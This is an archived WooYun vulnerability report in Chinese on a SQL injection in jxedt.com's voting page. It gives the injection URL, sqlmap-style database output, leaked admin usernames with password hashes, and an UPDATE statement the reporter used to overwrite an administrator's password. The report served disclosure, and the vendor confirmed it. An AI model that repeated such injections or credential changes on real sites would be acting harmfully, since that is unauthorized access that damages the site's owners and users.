漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-018731
漏洞标题:驾校一点通网站SQL注射漏洞
相关厂商:驾校一点通
漏洞作者: O.o
提交时间:2013-02-18 14:27
修复时间:2013-04-04 14:28
公开时间:2013-04-04 14:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-02-18: 细节已通知厂商并且等待厂商处理中
2013-02-22: 厂商已经确认,细节仅向厂商公开
2013-03-04: 细节向核心白帽子及相关领域专家公开
2013-03-14: 细节向普通白帽子公开
2013-03-24: 细节向实习白帽子公开
2013-04-04: 细节向公众公开
简要描述:
据说全国最大的驾考科目一模拟平台啊。今天做题总是不能到95+,烦着顺手了下。然后就乌云了。
感觉13科目一号坑爹:
“在道路上发生交通事故造成人身伤亡时,要立即抢救受伤人员并迅速报警。”这个是对的!
“发生交通事故造成人员受伤时,要保护现场并立即报警。”这个也是对的!
我勒个去去!!!到底救不救!!!!
详细说明:
注入点:
http://news.jxedt.com/myvote.asp?VoteID=11
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[21:48:56] [INFO] fetching current database
current database: 'news_jxedt_com'
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[21:50:28] [INFO] fetching current user
current user: 'news_jxedt_com'
Database: news_jxedt_com
[26 tables]
+------------------------------------+
| dbo.[news_jxedt_com.<%NoDown%>] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.v_review_content |
| news_jxedt_com.NB_AdSense |
| news_jxedt_com.NB_ArticleTemplate |
| news_jxedt_com.NB_Column |
| news_jxedt_com.NB_Content |
| news_jxedt_com.NB_FriendLink |
| news_jxedt_com.NB_Interface |
| news_jxedt_com.NB_Ip |
| news_jxedt_com.NB_JsFile |
| news_jxedt_com.NB_Link |
| news_jxedt_com.NB_Master |
| news_jxedt_com.NB_MyFavorites |
| news_jxedt_com.NB_Placard |
| news_jxedt_com.NB_Review |
| news_jxedt_com.NB_System |
| news_jxedt_com.NB_Template |
| news_jxedt_com.NB_User |
| news_jxedt_com.NB_UserGroup |
| news_jxedt_com.NB_Vote |
| news_jxedt_com.S3_Tmp |
| news_jxedt_com.dtproperties |
| news_jxedt_com.pangolin_test_table |
+------------------------------------+
| news_jxedt_com.pangolin_test_table |
有人跑过了啊~
jxedt-cn
97757399087e166d
hustsony
1dfb69daf3087efe
jxedt-zxy
2c9fd2fb24dd5711
newsadmin
69df9c0c743c2d09
没解出来。
替换!!!
49ba59abbe56e057
123456
UPDATE news_jxedt_com.NB_Master SET Master_Password = '49ba59abbe56e057' WHERE Master_Id = 4
OVER!
漏洞证明:
见:详细说明
修复方案:
就一个投票系统重新做下呗亲,别用老的了嘛~
版权声明:转载请注明来源 O.o@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-02-22 10:20
厂商回复:
CNVD确认并复现所述情况,已在19日由CNVD直接联系网站管理方协调处置。
rank 8
最新状态:
暂无